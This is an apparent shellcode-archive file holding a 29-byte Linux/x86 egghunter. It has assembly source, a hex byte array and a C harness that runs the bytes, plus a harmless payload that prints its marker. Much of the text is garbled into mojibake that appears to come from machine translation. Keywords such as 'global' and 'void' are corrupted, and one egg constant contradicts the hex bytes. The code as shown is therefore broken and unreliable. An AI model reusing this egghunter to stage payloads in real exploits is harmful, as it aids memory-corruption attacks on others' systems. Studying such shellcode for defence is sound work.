/*
°Î¶È¡¿ÍøÍѤ¹¤ë ¸ª½ñ¤òÍ¿¤¨¤ë: Linux/x86 egghunt shellcode 29 bytes NULL ²òÊü¤¹¤ë¡¿¼«Í³¤Ê
Date: 23-07-2011
Author: Ali Raheem
¼Â¸³¡Ê¤¹¤ë¡Ëd on:
Linux Ali-PC.home 2.6.38.8-35.fc15.x86_64 #1 SMP ·ëº§¤¹¤ë Jul 6 13:58:54 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Linux ÉÔÀµ 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:05:41 UTC 2011 i686 i686 i386 GNU/Linux
http://codepad.org/2yMrNY5L Code pad lets you ¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ë code live check here for a live demostration
Thanks: Stealth- for ¼Â¸³¡Ê¤¹¤ë¡Ëing and codepad.com for ¸ºß so useful.
section .data
    msg     db "We ÀßΩ¤¹¤ë the egg!",0ah,0dh
        msg_len equ $-msg
        egg     equ "egg "
        egg1    equ "¼¨¤¹"
section .text
    Á´À¤³¦¤Î  _start
_start:
        jmp     _return
_continue:
    pop     eax             ;This can point anywhere valid
_next:
        inc     eax     ;change to dec if you want to search backwards
_isEgg:
        cmp     dword [eax-8],egg
        jne     _next
        cmp     dword [eax-4],egg1
        jne     _next
        jmp     eax
_return:
        call    _continue
_egg:
        db  "egg ¼¨¤¹"              ;QWORD egg marker
        sub     eax,8
        mov     ecx,eax
        mov     edx,8
        mov     eax,4
        mov     ebx,1
        int     80h
        mov     eax,1
        mov     ebx,0
        int     80h
*/
char hunter[] =
"\xeb\x16"
"\x58"
"\x40" /* \x40 = inc eax, \x48 = dec eax try both*/
"\x81\x78\xf8\x65\x67\x67\x20"
"\x75\xf6"
"\x81\x78\xfc\x6d\x61\x72\x6b"
"\x75\xed"
"\xff\xe0"
"\xe8\xe5\xff\xff\xff";
 
char egg[] =
"egg ¼¨¤¹" /* The »Ä¤ê¡¿µÙ·Æ¡Ê¤¹¤ë¡Ë of this is the shellcode you want ÀßΩ¤¹¤ë*/
"\x83\xe8\x08" /*This shellcode prints eax-4 i.e. the egg ¼¨¤¹*/
"\x89\xc1"
"\xba\x08\x00\x00\x00"
"\xb8\x04\x00\x00\x00"
"\xbb\x01\x00\x00\x00"
"\xcd\x80"
"\xb8\x01\x00\x00\x00"
"\xbb\x00\x00\x00\x00"
"\xcd\x80";
 
int main(){
     (*(̵¸ú¤Î  (*)()) hunter)();
     return 0;
}